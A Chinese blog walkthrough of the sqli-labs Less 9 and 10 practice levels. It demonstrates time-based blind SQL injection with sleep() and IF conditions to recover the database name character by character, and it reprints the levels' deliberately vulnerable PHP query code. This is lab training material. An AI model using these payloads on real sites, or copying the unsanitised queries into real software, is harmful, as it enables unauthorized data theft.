sqli-labs 通关指南:Less 9、10

Less 9 和 Less 10 都是时间盲注,主要思想是利用 IF 语句,结合 sleep() 函数制造时间差来判断注入的正确性。

Less-9

GET-Blind-Time based-Single Quotes(基于时间的 GET 单引号盲注)

判断注入类型

首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。

?id=1


接下来注入个查不到的参数,网页还是返回 “You are in...”。

?id=9999


注入个单引号进行闭合,网页还是返回 “You are in...”。

?id=1'


以下 3 种注入仍然还是返回 “You are in...”,说明此时网页不会回显任何有价值的信息。

?id=1'--+
?id=1"
?id=1"--+


转换思路,MySql 的 sleep() 函数能够起到休眠的作用。为了方便调试这里使用 brup 的重发器,注入如下参数响应时间没有异常。

?id=1 and sleep(1)--+


注入如下参数响应时间明显增加,并且主观上也能感受到延迟。这是明显的基于 时间盲注 的字符型 Sql 注入漏洞,我们需要使用 sleep() 函数制造时间差进行注入。

?id=1' and sleep(1)--+

获取数据库信息

注入流程与 Less 5 类似,不过这里的判断标准不是会显的信息,而是响应时间。MySQL 的 IF 语句允许根据表达式的某个条件或值结果来执行一组 SQL 语句,语法如下,当表达式 expr 为真时返回 value1 的值,否则返回 value2。

IF(expr, value1, value2)

此处因为无法回显任何东西,因此 ORDER BY 子句失效。我们使用 IF 语句结合 LENGTH() 函数对数据库名长度进行判断,如果猜测正确则令响应时间长一些。猜测数据库名长度小于 10 时响应时间超过,所以数据库名长度小于 10。

?id=1' AND IF(LENGTH(database())<10,sleep(1),1)--+


经过二分法测试,得出数据库长度为 8。

?id=1' AND IF(LENGTH(database())=8,sleep(1),1)--+


使用 left() 函数判断数据库名的第一位是否是字符 a,注入之后响应很快说明数据库名第一位不是 a。

?id=1' AND IF(LEFT((SELECT database()), 1)='a',sleep(1),1)--+


使用穷举法进行测试,得出数据库名的第一个字符为 “s”。

?id=1' AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+


接下来得出数据库名,再使用同样的方法继续爆破表名、字段名及其剩余信息。

?id=1' AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+

关卡 SQL 查询语句

$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
      echo '<font size="5" color="#FFFF00">';	
      echo 'You are in...........';
      echo "<br>";
      echo "</font>";
}
else 
{
      echo '<font size="5" color="#FFFF00">';
      echo 'You are in...........';
      //print_r(mysql_error());
      //echo "You have an error in your SQL syntax";
      echo "</br></font>";	
      echo '<font color= "#0000ff" font size= 3>';	
}

Less-10

GET-Blind-Time based-double quotes(基于时间的双引号盲注)

判断注入类型

首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。

?id=1


以下 5 种注入都是还是返回 “You are in...”,说明此时网页不会回显任何有价值的信息。

?id=9999
?id=1'
?id=1'--+
?id=1"
?id=1"--+


为了方便调试这里使用 brup 的重发器,注入以下 2 种参数响应时间没有异常。

?id=1 and sleep(1)--+
?id=1' and sleep(1)--+


使用双引号闭合时,响应时间明显增加,并且主观上也能感受到延迟,这是基于 时间盲注 的字符型 Sql 注入漏洞。

?id=1" and sleep(1)--+

获取数据库信息

Less 10 和 Less 9 差不多,知识 Less 10使用双引号进行闭合。此处因为无法回显任何东西,因此 ORDER BY 子句失效。使用 IF 语句结合 LENGTH() 函数进行诸如,猜测数据库名长度小于 10 时响应时间超过 1 秒。

?id=1" AND IF(LENGTH(database())<10,sleep(1),1)--+


经过二分法测试,得出数据库长度为 8。

?id=1" AND IF(LENGTH(database())=8,sleep(1),1)--+

获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。

?id=1" AND IF(ASCII(SUBSTR((SELECT database()),1,1))>109,sleep(1),1)--+


使用二分法进行测试,最后得出数据库名的第一个字符 ASCII 码值为 115。

?id=1" AND IF(ASCII(SUBSTR((SELECT database()),1,1))=115,sleep(1),1)--+


使用相同方法依次得出剩下的字符 ASCII 码值,连接在一起就是数据库名。

?id=1" AND IF(ASCII(SUBSTR((SELECT database()),2,1))=102,sleep(1),1)--+

关卡 SQL 查询语句

$id = '"'.$id.'"';
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
      echo '<font size="5" color="#FFFF00">';	
      echo 'You are in...........';
      echo "<br>";
      echo "</font>";
}
else 
{
      echo '<font size="5" color="#FFFF00">';
      echo 'You are in...........';
      //print_r(mysql_error());
      //echo "You have an error in your SQL syntax";
      echo "</br></font>";	
      echo '<font color= "#0000ff" font size= 3>';	
}
posted @ 2020-10-15 10:28  乌漆WhiteMoon  阅读(1245)  评论(0编辑  收藏  举报